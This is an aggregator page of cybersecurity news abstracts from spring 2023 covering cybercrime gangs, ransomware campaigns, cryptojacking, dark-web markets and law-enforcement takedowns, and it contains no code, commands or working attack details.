Abstract Cybersecurity researchers have unmasked the identity of one of the individuals who is believed to be associated with the e-crime actor known as  XE Group . According to  Menlo Security , which pieced together the information from different online sources, "Nguyen Huu Tai, who also goes by the names Joe Nguyen and Thanh Nguyen, has the strongest likelihood of being involved with the XE Group." XE Group (aka XeThanh), previously documented by  Malwarebytes  and  Volexity , has a history of carrying out cyber criminal activities since at least 2013. It's suspected to be a threat actor of Vietnamese origin. Some of the entities targeted by the threat actor span government agencies, construction organizations, and healthcare sectors. It's known to compromise internet-exposed servers with known exploits and monetize the intrusions by installing password theft or  credit card skimming code  for online services. "As far back as 2014, the threat actor was seen crea

The Hacker News

May 31, 2023

Cybercriminals Targeting Apache NiFi Instances for Cryptocurrency Mining Full Text

Abstract A financially motivated threat actor is actively scouring the internet for unprotected  Apache NiFi instances  to covertly install a cryptocurrency miner and facilitate lateral movement. The findings come from the SANS Internet Storm Center (ISC), which detected a spike in HTTP requests for "/nifi" on May 19, 2023. "Persistence is achieved via timed processors or entries to cron,"  said  Dr. Johannes Ullrich, dean of research for SANS Technology Institute. "The attack script is not saved to the system. The attack scripts are kept in memory only." A honeypot setup allowed the ISC to determine that the initial foothold is weaponized to drop a shell script that removes the "/var/log/syslog" file, disables the firewall, and terminates competing crypto-mining tools, before downloading and launching the Kinsing malware from a remote server. It's worth pointing out that  Kinsing  has a  track record  of  leveraging  publicly disclosed vulnerabilities in publicly accessible web applicati

The Hacker News

May 30, 2023

CAPTCHA-Breaking Services with Human Solvers Helping Cybercriminals Defeat Security Full Text

Abstract Cybersecurity researchers are warning about CAPTCHA-breaking services that are being offered for sale to bypass systems designed to distinguish legitimate users from bot traffic. "Because cybercriminals are keen on breaking CAPTCHAs accurately, several services that are primarily geared toward this market demand have been created," Trend Micro  said  in a report published last week. "These CAPTCHA-solving services don't use [optical character recognition] techniques or advanced machine learning methods; instead, they break CAPTCHAs by farming out CAPTCHA-breaking tasks to actual human solvers." CAPTCHA  – short for Completely Automated Public Turing test to tell Computers and Humans Apart – is a tool for differentiating real human users from automated users with the goal of combating spam and restricting fake account creation. While CAPTCHA mechanisms can be a  disruptive user experience , they are seen as an effective means to counter attacks from bot-ori

The Hacker News

May 25, 2023

Buhti Ransomware Gang Switches Tactics, Utilizes Leaked LockBit and Babuk Code Full Text

Abstract The threat actors behind the nascent  Buhti  ransomware have eschewed their custom payload in favor of leaked LockBit and Babuk ransomware families to strike Windows and Linux systems. "While the group doesn't develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types," Symantec  said  in a report shared with The Hacker News. The cybersecurity firm is tracking the cybercrime group under the name  Blacktail . Buhti was first highlighted by Palo Alto Networks Unit 42 in February 2023,  describing  it as a Golang ransomware targeting the Linux platform. Later that same month, Bitdefender revealed the use of a Windows variant that was deployed against Zoho ManageEngine products that were vulnerable to critical remote code execution flaws ( CVE-2022-47966 ). The operators have since been observed swiftly exploiting other severe bugs impacting IBM's Aspera Fasp

The Hacker News

May 22, 2023

Guerrilla Campaign: Lemon Group’s Business of Pre-infected Devices Full Text

Abstract The Lemon Group gained control over millions of smartphones globally through the preinstallation of a malware called Guerrilla, reported Trend Micro. The campaign has been active since 2018. Lemon Group conducts business for marketing and advertising companies and utilizes big data. This highl ... Read More

Cyware

May 22, 2023

Indonesian Cybercriminals Exploit AWS for Profitable Crypto Mining Operations Full Text

Abstract A financially motivated threat actor of Indonesian origin has been observed leveraging Amazon Web Services (AWS) Elastic Compute Cloud (EC2) instances to carry out illicit crypto mining operations. Cloud security company's Permiso P0 Labs, which first detected the group in November 2021, has assigned it the moniker  GUI-vil  (pronounced Goo-ee-vil). "The group displays a preference for Graphical User Interface (GUI) tools, specifically S3 Browser (version 9.5.5) for their initial operations," the company said in a report shared with The Hacker News. "Upon gaining AWS Console access, they conduct their operations directly through the web browser." Attack chains mounted by GUI-vil entail obtaining initial access by weaponizing AWS keys in publicly exposed source code repositories on GitHub or scanning for GitLab instances that are vulnerable to remote code execution flaws (e.g.,  CVE-2021-22205 ). A successful ingress is followed by privilege escalation and

The Hacker News

May 20, 2023

Researchers tie FIN7 cybercrime family to Clop ransomware Full Text

Abstract Long-running cybercrime cartel FIN7, which has made use of ransomware variants developed by groups including REvil and Maze, has added another strain to its arsenal. This time, its the Cl0p ransomware.

Cyware

May 20, 2023

Cybercrime gang FIN7 returned and was spotted delivering Clop ransomware Full Text

Abstract Cybercriminal gang FIN7 returned with a new wave of attacks aimed at deploying the Clop ransomware on victims' networks. Researchers at Microsoft Security Intelligence team published a series of tweets to warn of a new wave of attacks aimed at distributing...

Security Affairs

May 20, 2023

Notorious Cyber Gang FIN7 Returns Cl0p Ransomware in New Wave of Attacks Full Text

Abstract The notorious cybercrime group known as FIN7 has been observed deploying  Cl0p  (aka Clop) ransomware, marking the threat actor's first ransomware campaign since late 2021. Microsoft, which detected the activity in April 2023, is tracking the financially motivated actor under its new taxonomy  Sangria Tempest . "In these recent attacks, Sangria Tempest uses the PowerShell script POWERTRASH to load the Lizar post-exploitation tool and get a foothold into a target network," the company's threat intelligence team  said . "They then use OpenSSH and Impacket to move laterally and deploy Clop ransomware." FIN7  (aka Carbanak, ELBRUS, and ITG14) has been linked to other ransomware families such as Black Basta, DarkSide, REvil, and LockBit, with the threat actor acting as a precursor for Maze and Ryuk ransomware attacks.  Active since at least 2012, the group has a  track record  of  targeting  a broad spectrum of organizations spanning software, consulting, f

The Hacker News

May 19, 2023

Lemon Group gang pre-infected 9 million Android devices for fraudulent activities Full Text

Abstract The Lemon Group cybercrime ring has reportedly pre-installed malware known as Guerilla on almost 9 million Android devices. A cybercrime group tracked has Lemon Group has reportedly pre-installed malware known as Guerilla on almost 9 million...

Security Affairs

May 18, 2023

This Cybercrime Syndicate Pre-Infected Over 8.9 Million Android Phones Worldwide Full Text

Abstract A cybercrime enterprise known as  Lemon Group  is leveraging millions of pre-infected Android smartphones worldwide to carry out their malicious operations, posing significant supply chain risks. "The infection turns these devices into mobile proxies, tools for stealing and selling SMS messages, social media and online messaging accounts and monetization via advertisements and click fraud," cybersecurity firm Trend Micro  said . The activity encompasses no fewer than 8.9 million compromised Android devices, particularly budget phones, with a majority of the infections discovered in the U.S., Mexico, Indonesia, Thailand, Russia, South Africa, India, Angola, the Philippines, and Argentina. The findings were  presented  by researchers Fyodor Yarochkin, Zhengyu Dong, Vladimir Kropotov, and Paul Pajares at the Black Hat Asia conference held in Singapore last week. Describing it as a  continuously evolving problem , the cybersecurity firm said the threat actors are branching o

The Hacker News

May 18, 2023

8220 Gang Exploiting Oracle WebLogic Flaw to Hijack Servers and Mine Cryptocurrency Full Text

Abstract The notorious cryptojacking group tracked as  8220 Gang  has been spotted weaponizing a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware. The flaw in question is  CVE-2017-3506  (CVSS score: 7.4), which, when successfully exploited, could allow an unauthenticated attacker to execute arbitrary commands remotely. "This allows attackers to gain unauthorized access to sensitive data or compromise the entire system," Trend Micro researcher Sunil Bharti  said  in a report published this week. 8220 Gang,  first documented  by Cisco Talos in late 2018, is so named for its original use of port 8220 for command-and-control (C2) network communications. "8220 Gang identifies targets via scanning for misconfigured or vulnerable hosts on the public internet," SentinelOne  noted  last year. "8220 Gang is known to make use of SSH brute force attacks post-infection for the purp

The Hacker News

May 18, 2023

Royal Ransomware Group Builds Its Own Malware Loader Full Text

Abstract The Royal ransomware group, which spun off from Conti in early 2022, is refining its downloader using tactics and techniques that appear to draw directly from other post-Conti groups, says Yelisey Bohuslavskiy, chief research officer at Red Sense.

Cyware

May 17, 2023

Monitoring the dark web to identify threats to energy sector organizations Full Text

Abstract Searchlight Cyber researchers warn of threat actors that are offering on the dark web access to energy sector organizations. Dark web intelligence firm Searchlight Cyber published a report that analyzes how threat actors in the dark web prepare their...

Security Affairs

May 15, 2023

New Ransomware Gang RA Group Hits U.S. and South Korean Organizations Full Text

Abstract A new ransomware group known as  RA Group  has become the latest threat actor to leverage the leaked Babuk ransomware source code to spawn its own locker variant. The cybercriminal gang, which is said to have been operating since at least April 22, 2023, is rapidly expanding its operations, according to cybersecurity firm Cisco Talos. "To date, the group has compromised three organizations in the U.S. and one in South Korea across several business verticals, including manufacturing, wealth management, insurance providers and pharmaceuticals," security researcher Chetan Raghuprasad said in a report shared with The Hacker News. RA Group is no different from other ransomware gangs in that it launches double extortion attacks and runs a date leak site to apply additional pressure on victims into paying ransoms. The Windows-based binary employs  intermittent encryption  to speed up the process and evade detection, not to mention delete volume shadow copies and contents of t

The Hacker News

May 15, 2023

New RA Group ransomware gang is the latest group using leaked Babuk source code Full Text

Abstract A previously unknown ransomware group known as RA Group is targeting companies in U.S. and South Korea with leaked Babuk source code. Cisco Talos researchers recently discovered a new ransomware operation called RA Group that has been active since...

Security Affairs

May 12, 2023

Bl00dy Ransomware Gang actively targets the education sector exploiting PaperCut RCE Full Text

Abstract U.S. CISA and FBI warned of attacks conducted by the Bl00dy Ransomware Gang against the education sector in the country. The FBI and CISA issued a joint advisory warning that the Bl00dy Ransomware group is actively targeting the education sector...

Security Affairs

May 12, 2023

Israeli Threat Group Uses Fake Company Acquisitions in CEO Fraud Schemes Full Text

Abstract A group of cybercriminals based in Israel has launched more than 350 business email compromise (BEC) campaigns over the past two years, targeting large multinational companies from around the world.

Cyware

May 12, 2023

The Black Basta ransomware gang hit multinational company ABB Full Text

Abstract Swiss electrification and automation technology giant ABB suffered a Black Basta ransomware attack that impacted its business operations. Swiss multinational company ABB, a leading electrification and automation technology provider, it the last victim...

Security Affairs

May 11, 2023

Spanish Police Takes Down Massive Cybercrime Ring, 40 Arrested Full Text

Abstract The National Police of Spain said it arrested 40 individuals for their alleged involvement in an organized crime gang called Trinitarians . Among those apprehended include two hackers who carried out bank scams through phishing and smishing techniques and 15 other members of the crime syndicate, who have all been charged with a number of offenses such as bank fraud, forging documents, identity theft, and money laundering. In all, the nefarious scheme is believed to have defrauded more than 300,000 victims, resulting in losses of over €700,000. "The criminal organization used hacking tools and business logistics to carry out computer scams," officials  said . To pull off the attacks, the cybercriminals sent bogus links via SMS that, when clicked, redirected users to a phishing panel masquerading as legitimate financial institutions to steal their credentials and abuse the access to request for loans and link the cards to cryptocurrency wallets under their control. These

The Hacker News

May 09, 2023

U.S. Authorities Seize 13 Domains Offering Criminal DDoS-for-Hire Services Full Text

Abstract U.S. authorities have announced the seizure of 13 internet domains that offered DDoS-for-hire services to other criminal actors. The takedown is part of an ongoing international initiative dubbed  Operation PowerOFF  that's aimed at dismantling criminal DDoS-for-hire infrastructures worldwide. The development comes almost five months after a "sweep" in December 2022  dismantled 48 similar services  for abetting paying users to launch distributed denial-of-service (DDoS) attacks against targets of interest. This includes school districts, universities, financial institutions, and government websites, according to the U.S. Department of Justice (DoJ). Ten of the 13 illicit domains seized are "reincarnations" of booter or stresser services that were previously shuttered towards the end of last year. "In recent years, booter services have continued to proliferate, as they offer a low barrier to entry for users looking to engage in cybercriminal activity,

The Hacker News

May 8, 2023

Money Message gang leaked private code signing keys from MSI data breach Full Text

Abstract The ransomware gang behind the attack on Taiwanese PC maker MSI leaked the company's private code signing keys on their darkweb leak site. In early April, the ransomware gang Money Message announced to have hacked the Taiwanese multinational IT corporation...

Security Affairs

May 6, 2023

FBI seized other domains used by the shadow eBook library Z-Library Full Text

Abstract The FBI disrupted once again the illegal eBook library Z-Library the authorities seized several domains used by the service. The Federal Bureau of Investigation (FBI) seized multiple domains used by the illegal shadow eBook library Z-Library. Z-Library...

Security Affairs

May 04, 2023

Ransomware gang hijacks university alert system to issue threats Full Text

Abstract The Avos ransomware gang hijacked Bluefield University's emergency broadcast system, "RamAlert," to send students and staff SMS texts and email alerts that their data was stolen and would soon be released.

BleepingComputer

May 3, 2023

Authorities dismantled the card-checking platform Try2Check Full Text

Abstract Authorities dismantled the Try2Check platform, a Card-Checking platform that generated tens of millions of dollars in revenue. The U.S. DoJ charged the Russian citizen Denis Gennadievich Kulkov with running the Card-Checking services. The platform...

Security Affairs

May 03, 2023

Operation SpecTor: $53.4 Million Seized, 288 Vendors Arrested in Dark Web Drug Bust Full Text

Abstract An international law enforcement operation has resulted in the arrest of 288 vendors who are believed to be involved in drug trafficking on the dark web, adding to a long list of  criminal enterprises  that have been shuttered in recent years. The effort, codenamed Operation SpecTor , also saw the authorities confiscating more than $53.4 million in cash and virtual currencies, 850 kg of drugs, and 117 firearms. The largest number of arrests were made in the U.S. (153), followed by the U.K. (55), Germany (52), the Netherlands (10), Austria (9), France (5), Switzerland (2), Poland (1), and Brazil (1). "This represents the most funds seized and the highest number of arrests in any coordinated international action," U.S. Attorney General Merrick B. Garland  said . "The drug traffickers are confident that, by operating anonymously on the dark web, they can operate outside the bounds of the law. They are wrong." The arrests stem from evidence gathered after the  tak

The Hacker News

May 2, 2023

FBI and Ukrainian police seized 9 crypto exchanges used by cybercriminals Full Text

Abstract A joint operation conducted by the FBI and Ukrainian police seized 9 crypto exchanges used by cybercriminal groups for money laundering. The Cyber ​​Police Department together with the Main Investigative Department of the National Police, the Office...

Security Affairs

May 2, 2023

Ransomware Gang Claims Data Theft From Edison Learning Full Text

Abstract The Royal ransomware is claiming to have infiltrated public school management and virtual learning provider Edison Learning, posting on its dark web data leak site on Wednesday, April 26, that it had stolen 20GB of the company’s data.

Cyware

May 2, 2023

SpecTor operation: 288 individuals arrested in the seizure of marketplace Monopoly Market Full Text

Abstract International law enforcement operation SpecTor resulted in the seizure of an online marketplace and the arrest of nearly 300 people. In an international law enforcement operation coordinated by Europol, codenamed 'SpecTor', the police seized the illegal...

Security Affairs

May 1, 2023

Cybercriminals use proxies to legitimize fraudulent requests Full Text

Abstract Bot attacks were previously seen as a relatively inconsequential type of online fraud, and that mentality has persisted even as threat actors have gained the ability to cause significant damage to revenue and brand reputation, according to HUMAN.

Cyware

April 28, 2023

Ukraine cyber police arrested a man for selling data of 300M people Full Text

Abstract The Ukrainian cyber police arrested a Ukraine man for selling the data of over 300 million people from different countries. The Ukrainian cyber police have arrested a man (36) from the city of Netishyn for selling the personal data and sensitive information...

Security Affairs

April 24, 2023

8220 Gang of Cryptojackers Exploit Log4Shell to Mint Coins Full Text

Abstract Researchers found 8220 Gang exploiting the Log4Shell vulnerability to install CoinMiner in VMware Horizon servers of Korean energy-related companies. The gang uses a PowerShell script to download ScrubCrypt and establish persistence by making edits to the registry entries. System administrators are ... Read More

Cyware

April 24, 2023

Russian cybercrime group likely behind ongoing exploitation of PaperCut flaws Full Text

Abstract Print management software provider PaperCut confirmed ongoing active exploitation of CVE-2023-27350 vulnerability. On April 19th, Print management software provider PaperCut confirmed that it is aware of the active exploitation of the CVE-2023-27350...

Security Affairs

April 20, 2023

Lazarus Group Adds Linux Malware to Arsenal in Operation Dream Job Full Text

Abstract The notorious North Korea-aligned state-sponsored actor known as the  Lazarus Group  has been attributed to a new campaign aimed at Linux users. The attacks are part of a persistent and long-running activity tracked under the name  Operation Dream Job , ESET said in a  new report  published today. The findings are crucial, not least because it marks the first publicly documented example of the adversary using Linux malware as part of this social engineering scheme. Operation Dream Job , also known as  DeathNote or NukeSped , refers to multiple attack waves wherein the group leverages fraudulent job offers as a lure to trick unsuspecting targets into downloading malware. It also  exhibits overlaps  with two other Lazarus clusters known as Operation In(ter)ception and Operation North Star. The attack chain discovered by ESET is no different in that it delivers a fake HSBC job offer as a decoy within a ZIP archive file that's then used to launch a Linux backdoor named SimplexTea

The Hacker News

April 19, 2023

Russian national sentenced to time served for committing money laundering for the Ryuk ransomware operation Full Text

Abstract Russian national Denis Mihaqlovic Dubnikov has been sentenced to time served for committing money laundering for the Ryuk ransomware operation. Russian national Denis Dubnikov (30) has been sentenced to time served for committing money laundering...

Security Affairs

April 18, 2023

Experts temporarily disrupted the RedLine Stealer operations Full Text

Abstract Security experts from ESET, have temporarily disrupted the operations of the RedLine Stealer with the help of GitHub. ESET researchers announced to have temporarily disrupted the operations of the RedLine Stealer with the help of GitHub. The two companies...

Security Affairs

April 18, 2023

The intricate relationships between the FIN7 group and members of the Conti ransomware gang Full Text

Abstract A new malware, dubbed Domino, developed by the FIN7 cybercrime group has been used by the now-defunct Conti ransomware gang. IBM Security X-Force researchers recently discovered a new malware family, called Domino, which was created by developers...

Security Affairs

April 17, 2023

FIN7 and Ex-Conti Cybercrime Gangs Join Forces in Domino Malware Attacks Full Text

Abstract A new strain of malware developed by threat actors likely affiliated with the FIN7 cybercrime group has been put to use by the members of the now-defunct Conti ransomware gang, indicating collaboration between the two crews. The malware, dubbed  Domino , is primarily designed to facilitate follow-on exploitation on compromised systems, including delivering a lesser-known information stealer that has been advertised for sale on the dark web since December 2021. "Former members of the  TrickBot/Conti syndicate  [...] have been using Domino since at least late February 2023 to deliver either the Project Nemesis information stealer or more capable backdoors such as Cobalt Strike," IBM Security X-Force security researcher Charlotte Hammond  said  in a report published last week. FIN7 , also called Carbanak and ITG14, is a prolific  Russian-speaking cybercriminal syndicate  that's known to employ an array of custom malware to deploy additional malware and broaden its monet

The Hacker News

April 17, 2023

Vice Society gang is using a custom PowerShell tool for data exfiltration Full Text

Abstract Vice Society ransomware operators have been spotted using a PowerShell tool to exfiltrate data from compromised networks. Palo Alto Unit 42 team identified observed the Vice Society ransomware gang exfiltrating data from a victim network using a custom-built Microsoft...

Security Affairs

April 14, 2023

RTM Locker, a new RaaS gains notorieties in the threat landscape Full Text

Abstract Cybersecurity firm Trellix analyzed the activity of an emerging cybercriminal group called 'Read The Manual' RTM Locker. Researchers from cybersecurity firm Trellix have detailed the tactics, techniques, and procedures of an emerging cybercriminal...

Security Affairs

April 13, 2023

RTM Locker: Emerging Cybercrime Group Targeting Businesses with Ransomware Full Text

Abstract Cybersecurity researchers have detailed the tactics of a "rising" cybercriminal gang called "Read The Manual" (RTM) Locker that functions as a private ransomware-as-a-service (RaaS) provider and carries out opportunistic attacks to generate illicit profit. "The 'Read The Manual' Locker gang uses affiliates to ransom victims, all of whom are forced to abide by the gang's strict rules," cybersecurity firm Trellix said in a report shared with The Hacker News. "The business-like set up of the group, where affiliates are required to remain active or notify the gang of their leave, shows the organizational maturity of the group, as has also been observed in other groups, such as  Conti ." RTM , first documented by ESET in February 2017,  started off  in 2015 as a banking malware targeting businesses in Russia via drive-by downloads, spam, and phishing emails. Attack chains mounted by the group have since  evolved  to deploy a ransomwa

The Hacker News

April 12, 2023

Following the Lazarus group by tracking DeathNote campaign Full Text

Abstract This threat cluster linked to the North Korean threat actor Lazarus is also known as Operation DreamJob or NukeSped. It's dubbed DeathNote after its malware payloads named Dn.dll or Dn64.dll.

Cyware

April 12, 2023

Cybercrime group exploits Windows zero-day in ransomware attacks Full Text

Abstract Microsoft has addressed a zero-day in the Windows Common Log File System (CLFS) actively exploited in ransomware attacks. Microsoft has addressed a zero-day vulnerability, tracked as CVE-2023-28252, in the Windows Common Log File System (CLFS), which...

Security Affairs

April 12, 2023

Criminals Pose as Chinese Authorities to Target US-based Chinese Community Full Text

Abstract Criminals exploit widely publicized efforts by the People’s Republic of China government to harass and facilitate the repatriation of individuals living in the United States to build plausibility for their fraud.

Cyware

April 11, 2023

Cybercriminals Turn to Android Loaders on Dark Web to Evade Google Play Security Full Text

Abstract Malicious loader programs capable of trojanizing Android applications are being traded on the criminal underground for up to $20,000 as a way to evade Google Play Store defenses. "The most popular application categories to hide malware and unwanted software include cryptocurrency trackers, financial apps, QR-code scanners, and even dating apps," Kaspersky  said  in a new report based on messages posted on online forums between 2019 and 2023. Dropper apps  are the primary means for threat actors looking to sneak malware via the Google Play Store. Such apps often masquerade as seemingly innocuous apps, with malicious updates introduced upon clearing the review process and the applications have amassed a significant user base. This is achieved by using a loader program that's responsible for injecting malware into a clean app, which is then made available for download from the app marketplace. Users who install the tampered app are prompted to grant it intrusive permiss

The Hacker News

April 10, 2023

New Darknet Market Styx Offers a Variety of Frauds and Services Full Text

Abstract A new dark web marketplace identified as Styx is gaining popularity among cybercriminals for providing access to a wide range of illegal services such as DDoS attacks, banking trojans, stolen IDs, and 2FA/MFA bypass solutions. It uses Telegram channels where various automated bots interact wit ... Read More

Cyware

April 9, 2023

Estonian National charged with helping Russia acquire U.S. hacking tools and electronics Full Text

Abstract Andrey Shevlyakov, an Estonian national, was charged in the US with conspiracy and other charges related to acquiring U.S.-made electronics on behalf of the Russian government and military. The Estonian man is accused of having helped the Russian...

Security Affairs

April 7, 2023

Microsoft aims at stopping cybercriminals from using cracked copies of Cobalt Strike Full Text

Abstract Microsoft announced it has taken legal action to disrupt the illegal use of copies of the post-exploitation tool Cobalt Strike by cybercriminals. Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named...

Security Affairs

April 06, 2023

FBI Cracks Down on Genesis Market: 119 Arrested in Cybercrime Crackdown Full Text

Abstract A coordinated international law enforcement operation has dismantled Genesis Market, an illegal online marketplace that specialized in the sale of stolen credentials associated with email, bank accounts, and social media platforms. Coinciding with the infrastructure seizure, the major crackdown, which involved authorities from 17 countries, culminated in 119 arrests and 208 property searches in 13 nations. However, the  .onion mirror of the market  appears to be still up and running . The "unprecedented"  law   enforcement   exercise  has been codenamed  Operation Cookie Monster . Genesis Market, since its inception in March 2018, evolved into a major hub for criminal activities, offering access to data stolen from over 1.5 million compromised computers across the world totaling more than 80 million credentials. A majority of infections associated with Genesis Market related malware have been detected in the U.S., Mexico, Germany, Turkey, Sweden, Italy, France, Spain, Po

The Hacker News

April 6, 2023

FBI Says it Obtained Details on 59,000 Users of Hacking Site Genesis Market Full Text

Abstract A US official says the server copies include information about approximately 59,000 individual user accounts, such as usernames, passwords, email accounts, and secure messenger accounts, in addition to a history of user activity.

Cyware

April 5, 2023

Law enforcement seized the Genesis Market cybercrime marketplace Full Text

Abstract Law enforcement seized the Genesis Market black marketplace, a platform focused on the sale of stolen credentials, as part of Operation Cookie Monster. The FBI seized the Genesis Market, a black marketplace for stolen credentials that was launched...

Security Affairs

April 5, 2023

STYX Marketplace emerged in Dark Web focused on Financial Fraud Full Text

Abstract The STYX marketplace was launched at the beginning of 2023. This discovery illustrates the post-pandemic menace of cyber-enabled financial crime and the threat it poses to financial institutions and their customers.

Cyware

April 4, 2023

ALPHV/BlackCat ransomware affiliate targets Veritas Backup solution bugs Full Text

Abstract An ALPHV/BlackCat ransomware affiliate was spotted exploiting vulnerabilities in the Veritas Backup solution. An affiliate of the ALPHV/BlackCat ransomware gang, tracked as UNC4466, was observed exploiting three vulnerabilities in the Veritas Backup...

Security Affairs

April 1, 2023

Operation Henhouse: Hundreds of arrests and millions in assets seized in month tackling fraud Full Text

Abstract The NCA’s National Economic Crime Centre has led a successful operation working closely with the City of London Police and other policing partners against suspected fraudsters across the UK.

Cyware

March 31, 2023

Cyber Police of Ukraine arrested members of a gang that defrauded EU citizens of $4.33M Full Text

Abstract The Cyber Police of Ukraine, with law enforcement officials from Czechia, has arrested several members of a gang responsible for $4.33 million scam. The Cyber Police of Ukraine, with the support of law enforcement officials from the Czech Republic,...

Security Affairs

March 29, 2023

DarkBit puts data from Israel’s Technion university on sale Full Text

Abstract The ransomware attack hit Technion on February 12, forcing the university to block all communication networks. DarkBit originally demanded 80 bitcoins as ransom from the university.

Cyware

March 28, 2023

Europol warns of criminal use of ChatGPT Full Text

Abstract Europol warns of cybercriminal organizations can take advantage of systems based on artificial intelligence like ChatGPT. EU police body Europol warned about the potential abuse of systems based on artificial intelligence, such as the popular chatbot...

Security Affairs

March 28, 2023

Europol details ChatGPT’s potential for criminal abuse Full Text

Abstract ChatGPT’s ability to draft highly realistic text makes it a useful tool for phishing purposes. In addition to generating human-like language, ChatGPT is capable of producing code in a number of different programming languages.

Cyware

March 27, 2023

The FBI’s BreachForums bust is causing ‘chaos in the cybercrime underground’ Full Text

Abstract On March 16, 2022, about a month after the FBI took down a popular online forum for buying and selling stolen data known as RaidForums, another criminal marketplace quickly sprung up to take its place.

Cyware

March 25, 2023

U.K. National Crime Agency Sets Up Fake DDoS-For-Hire Sites to Catch Cybercriminals Full Text

Abstract In what's a case of setting a thief to catch a thief, the U.K. National Crime Agency (NCA) revealed that it has created a network of fake DDoS-for-hire websites to infiltrate the online criminal underground. "All of the NCA-run sites, which have so far been accessed by around several thousand people, have been created to look like they offer the tools and services that enable cyber criminals to execute these attacks," the law enforcement agency  said . "However, after users register, rather than being given access to cyber crime tools, their data is collated by investigators." The effort is part of an ongoing international joint effort called Operation PowerOFF in collaboration with authorities from the U.S., the Netherlands, Germany, Poland, and Europol aimed at dismantling criminal DDoS-for-hire infrastructures worldwide. DDoS-for-hire (aka "Booter" or "Stresser") services rent out access to a network of infected devices to other crim

The Hacker News

March 25, 2023

NCA infiltrates the cybercriminal underground with fake DDoS-for-hire sites Full Text

Abstract The U.K. National Crime Agency (NCA) revealed that it has set up a number of fake DDoS-for-hire sites to infiltrate the online criminal underground. The UK National Crime Agency announced it has infiltrated the online criminal marketplace by setting...

Security Affairs

March 22, 2023

BreachForums current Admin Baphomet shuts down BreachForums Full Text

Abstract Baphomet, the current administrator of BreachForums, announced that the popular hacking forum has been officially taken down. U.S. law enforcement arrested last week a US man that goes online with the moniker “Pompompurin,” the US citizen is accused...

Security Affairs

March 22, 2023

BreachForums Administrator Baphomet Shuts Down Infamous Hacking Forum Full Text

Abstract In a sudden turn of events, Baphomet, the current administrator of BreachForums, said in an update on March 21, 2023, that the hacking forum has been officially taken down but emphasized that "it's not the end." "You are allowed to hate me, and disagree with my decision but I promise what is to come will be better for us all," Baphomet noted in a message posted on the BreachForums Telegram channel. The  shutdown  is suspected to have been prompted by suspicions that law enforcement may have obtained access to the site's configurations, source code, and information about the forum's users. The development follows the  arrest of its administrator  Conor Brian Fitzpatrick (aka "pompompurin"), who has been charged with a single count of conspiracy to commit access device fraud. Over the past few months, BreachForums filled the void left by RaidForums last year, becoming a lucrative destination to purchase and sell stolen databases from variou

The Hacker News

March 21, 2023

Crooks stole more than $1.5M worth of Bitcoin from General Bytes ATMs Full Text

Abstract Cryptocurrency ATM maker General Bytes suffered a security breach over the weekend, the hackers stole $1.5M worth of cryptocurrency. Cryptocurrency ATM manufacturers General Bytes suffered a security incident that resulted in the theft of $1.5M worth...

Security Affairs

March 20, 2023

Killnet Aggressively Targets Healthcare Organizations Full Text

Abstract KillNet, a cybercriminal collective with ties to Russia, was spotted targeting Microsoft Azure-hosted healthcare apps for more than three months. The highest number of these attacks were launched in February, targeting hospitals, pharma, life science, healthcare insurance, and health services in mo ... Read More

Cyware

March 18, 2023

Feds arrested Pompompurin, the alleged owner of BreachForums Full Text

Abstract U.S. law enforcement arrested this week a US citizen suspected to be Pompompurin, the notorious owner of the BreachForums cybercrime forum. U.S. law enforcement arrested this week a US man that goes online with the moniker "Pompompurin," the US citizen...

Security Affairs

March 18, 2023

Pompompurin Unmasked: Infamous BreachForums Mastermind Arrested in New York Full Text

Abstract U.S. law enforcement authorities have arrested a New York man in connection with running the infamous BreachForums hacking forum under the online alias " Pompompurin ." The development, first reported by  Bloomberg Law , comes after News 12 Westchester, earlier this week, said that federal investigators "spent hours inside and outside of a home in Peekskill." "At one point, investigators were seen removing several bags of evidence from the house," the New York-based local news service  added . According  to an  affidavit  filed by the Federal Bureau of Investigation (FBI), the suspect identified himself as Conor Brian Fitzpatrick and that he admitted to being the owner of the BreachForums website. "When I arrested the defendant on March 15, 2023, he stated to me in substance and in part that: a) his name was Conor Brian Fitzpatrick; b) he used the alias 'pompompurin,' and c) he was the owner and administrator of 'BreachForums,'&

The Hacker News

March 16, 2023

Makop Ransomware Gang: A Detailed Look Full Text

Abstract Cybersecurity researcher Luca Mella shared technical insights on the Makop ransomware that attains persistence through dedicated .NET tools. To access victim networks, the gang makes use of internet-facing bugs and exposed remote administrative services. The operators began to work for their crimin ... Read More

Cyware

March 16, 2023

Authorities Shut Down ChipMixer Platform Tied to Crypto Laundering Scheme Full Text

Abstract A coalition of law enforcement agencies across Europe and the U.S.  announced  the takedown of ChipMixer, an unlicensed cryptocurrency mixer that began its operations in August 2017. "The ChipMixer software blocked the blockchain trail of the funds, making it attractive for cybercriminals looking to launder illegal proceeds from criminal activities such as drug trafficking, weapons trafficking, ransomware attacks, and payment card fraud," Europol  said  in a statement. The coordinated exercise, besides dismantling the clearnet and dark web websites associated with ChipMixer, also resulted in the seizure of $47.5 million in Bitcoin and 7 TB of data. Mixers, also called tumblers,  offer full anonymity  for a fee by commingling cryptocurrency from different users – both legitimate and criminally-derived funds – in a manner that makes it hard to trace the origins. This is achieved by funneling different payments into a single pool before splitting up each amount and transmit

The Hacker News

March 15, 2023

Criminals already targeting nervous CVB customers Full Text

Abstract According to various researchers and security firms, threat actors are already out hunting for SVB-exposed prey through both passive and active phishing scams, including similar fake domains and business email compromise (BEC) attacks.

Cyware

March 14, 2023

LockBit Ransomware gang claims to have stolen SpaceX confidential data from Maximum Industries Full Text

Abstract The LockBit ransomware group claims to have stolen confidential data belonging to SpaceX from the systems of Maximum Industries. The LockBit ransomware gang claims to have stolen confidential data of SpaceX after they hacked the systems of production...

Security Affairs

March 14, 2023

LockBit Claims it Stole SpaceX Schematics From Parts Supplier, Threatens to Leak Them Full Text

Abstract Ransomware gang Lockbit has boasted it broke into Maximum Industries, which makes parts for SpaceX, and stole 3,000 proprietary schematics developed by Elon Musk's rocketeers.

Cyware

March 14, 2023

Dissecting the malicious arsenal of the Makop ransomware gang Full Text

Abstract Cyber security researcher Luca Mella analyzed the Makop ransomware employed in a recent intrusion. Executive summary Insights from a recent intrusion authored by Makop ransomware operators show persistence capability through dedicated .NET tools. Makop...

Security Affairs

March 10, 2023

Law enforcement seized the website selling the NetWire RAT and arrested a Croatian man Full Text

